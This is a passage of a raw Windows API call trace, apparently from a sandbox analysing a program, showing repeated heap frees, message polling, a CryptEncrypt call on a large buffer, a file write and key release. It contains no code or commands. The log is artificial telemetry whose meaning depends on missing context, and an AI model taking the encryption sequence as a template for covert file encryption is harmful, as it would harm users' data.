hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba28 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab788 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab7a0 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a783b8 | out: hHeap=0x2af0000) returned 1 [0222.090] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab890 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab848 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab830 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabd10 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8c0 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab8a8 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.091] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2acd728 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72088 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbc0 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabbf0 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5dfa8 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabaa0 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71db8 | out: hHeap=0x2af0000) returned 1 [0222.092] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaba70 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb60 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72028 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb48 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb78 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72098 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabcc8 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabb90 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71fe8 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aabc80 | out: hHeap=0x2af0000) returned 1 [0222.092] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a720d8 | out: hHeap=0x2af0000) returned 1 [0222.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0222.093] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabbc0, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0222.093] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8cef60*=0xf74c, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8cef60*=0xf750) returned 1 [0222.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.093] CharLowerBuffW (in: lpsz="byte[63312]", cchLength=0xb | out: lpsz="byte[63312]") returned 0xb [0222.093] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.095] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.095] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.095] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.095] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.095] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.095] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0222.096] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0222.096] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x2aabc98, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0222.096] CryptEncrypt (in: hKey=0x9e1bf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2acd728*, pdwDataLen=0x8cef60*=0xf74c, dwBufLen=0xf750 | out: pbData=0x2acd728*, pdwDataLen=0x8cef60*=0xf750) returned 1 [0222.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.099] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.099] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.099] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.099] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.099] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.099] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.099] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.099] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.099] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.099] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.099] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.099] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0222.099] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.099] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.099] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.100] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.100] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.100] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0222.100] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.100] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0222.100] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0222.105] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.105] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.105] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.106] WriteFile (in: hFile=0x50c, lpBuffer=0x2aae878*, nNumberOfBytesToWrite=0xf750, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x2aae878*, lpNumberOfBytesWritten=0x8cf5e4*=0xf750, lpOverlapped=0x0) returned 1 [0222.108] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.108] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.108] CharUpperBuffW (in: lpsz="A4D00401A22", cchLength=0xb | out: lpsz="A4D00401A22") returned 0xb [0222.108] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.108] CharUpperBuffW (in: lpsz="SSA4D00401A22", cchLength=0xd | out: lpsz="SSA4D00401A22") returned 0xd [0222.108] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.108] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.108] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.108] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0222.108] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.108] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0222.109] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0222.109] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0222.109] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2aab9c8, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0222.109] CryptDestroyKey (hKey=0x9e1bf8) returned 1 [0222.109] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.109] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.109] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.109] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.109] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.109] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.109] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.109] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.109] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0222.110] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.110] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0222.110] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0222.110] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0222.110] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.110] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.110] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0222.110] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.110] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0222.110] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0222.110] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.110] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0222.110] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.110] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0222.110] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0222.110] CharUpperBuffW (in: lpsz="A170020032E", cchLength=0xb | out: lpsz="A170020032E") returned 0xb [0222.110] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.110] CharUpperBuffW (in: lpsz="SSA170020032E", cchLength=0xd | out: lpsz="SSA170020032E") returned 0xd [0222.110] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.110] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.110] CharUpperBuffW (in: lpsz="A0000901A0E", cchLength=0xb | out: lpsz="A0000901A0E") returned 0xb [0222.110] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.110] CharUpperBuffW (in: lpsz="SSA0000901A0E", cchLength=0xd | out: lpsz="SSA0000901A0E") returned 0xd [0222.111] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.111] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.111] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0222.111] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.111] CharUpperBuffW (in: lpsz="A1A0070620F", cchLength=0xb | out: lpsz="A1A0070620F") returned 0xb [0222.111] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.111] CharUpperBuffW (in: lpsz="SSA1A0070620F", cchLength=0xd | out: lpsz="SSA1A0070620F") returned 0xd [0222.111] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.111] PeekMessageW (in: lpMsg=0x8cf0a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf0a8) returned 0 [0222.111] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.111] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0222.111] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.111] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0222.111] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.111] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.111] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0222.111] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.111] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0222.111] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.111] PeekMessageW (in: lpMsg=0x8cf138, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf138) returned 0 [0222.111] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0222.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0222.111] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptReleaseContext", cchWideChar=20, lpMultiByteStr=0x29f7200, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptReleaseContext", lpUsedDefaultChar=0x0) returned 20 [0222.112] CryptReleaseContext (hProv=0xa7c550, dwFlags=0x0) returned 1 [0222.112] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0222.112] CharUpperBuffW (in: 